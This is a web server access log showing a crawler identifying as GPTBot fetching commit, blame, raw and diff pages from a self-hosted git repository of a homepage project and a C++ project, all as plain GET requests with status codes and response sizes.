+[17/Feb/2026:13:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services" [Client 74.7.227.38] [Length 9858] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services" +[17/Feb/2026:13:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" [Client 74.7.227.38] [Length 9846] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" +[17/Feb/2026:13:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" +[17/Feb/2026:13:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429.diff" [Client 74.7.227.38] [Length 889] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" +[17/Feb/2026:13:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10125] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" +[17/Feb/2026:13:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" +[17/Feb/2026:13:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15545] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" +[17/Feb/2026:13:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 230661] [Gzip 25.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" +[17/Feb/2026:13:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16469] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" +[17/Feb/2026:13:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15544] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" +[17/Feb/2026:13:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16467] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" +[17/Feb/2026:13:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14193] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" +[17/Feb/2026:13:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14191] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" +[17/Feb/2026:13:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" [Client 74.7.227.38] [Length 14810] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" +[17/Feb/2026:13:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" [Client 74.7.227.38] [Length 13923] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" +[17/Feb/2026:13:20:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" [Client 74.7.227.38] [Length 13922] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" +[17/Feb/2026:13:20:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" [Client 74.7.227.38] [Length 14808] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" +[17/Feb/2026:13:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" +[17/Feb/2026:13:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15901] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" +[17/Feb/2026:13:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" +[17/Feb/2026:13:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" +[17/Feb/2026:13:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" +[17/Feb/2026:13:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15903] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" +[17/Feb/2026:13:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14296] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" +[17/Feb/2026:13:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" [Client 74.7.227.38] [Length 14960] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" +[17/Feb/2026:13:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16912] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" +[17/Feb/2026:13:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14298] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" +[17/Feb/2026:13:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" [Client 74.7.227.38] [Length 14961] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" +[17/Feb/2026:13:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16910] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" +[17/Feb/2026:13:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" +[17/Feb/2026:13:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" +[17/Feb/2026:13:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" +[17/Feb/2026:13:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" +[17/Feb/2026:13:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" +[17/Feb/2026:13:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" +[17/Feb/2026:13:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" +[17/Feb/2026:13:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" +[17/Feb/2026:13:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" [Client 74.7.227.38] [Length 13782] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" +[17/Feb/2026:13:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" +[17/Feb/2026:13:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" [Client 74.7.227.38] [Length 13781] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" +[17/Feb/2026:13:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" +[17/Feb/2026:13:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" +[17/Feb/2026:13:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" +[17/Feb/2026:13:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" +[17/Feb/2026:13:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" +[17/Feb/2026:13:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" [Client 74.7.227.38] [Length 11836] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" +[17/Feb/2026:13:20:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" [Client 74.7.227.38] [Length 11838] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" +[17/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 137310] [Gzip 14.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:13:20:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" +[17/Feb/2026:13:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" +[17/Feb/2026:13:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" +[17/Feb/2026:13:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" [Client 74.7.227.38] [Length 13001] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" +[17/Feb/2026:13:20:28 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" +[17/Feb/2026:13:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" [Client 74.7.227.38] [Length 10727] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 